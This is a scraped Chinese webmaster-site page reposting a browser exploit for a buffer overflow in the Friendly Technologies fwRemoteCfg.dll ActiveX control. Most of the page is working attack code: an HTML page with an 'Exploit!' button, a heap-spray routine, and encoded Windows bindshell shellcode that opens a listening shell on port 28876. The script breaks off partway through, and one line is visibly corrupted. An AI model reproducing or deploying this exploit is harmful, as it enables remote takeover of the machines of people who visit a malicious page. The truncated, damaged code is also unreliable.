站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: TGS CMS 0.3.2r2 Remote Code Execution Exploit
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 黑客漏洞 > » 正文

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF E

来源: 易采站长站
<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">

<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize heapHdrSize); // Size of the Nop slide
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -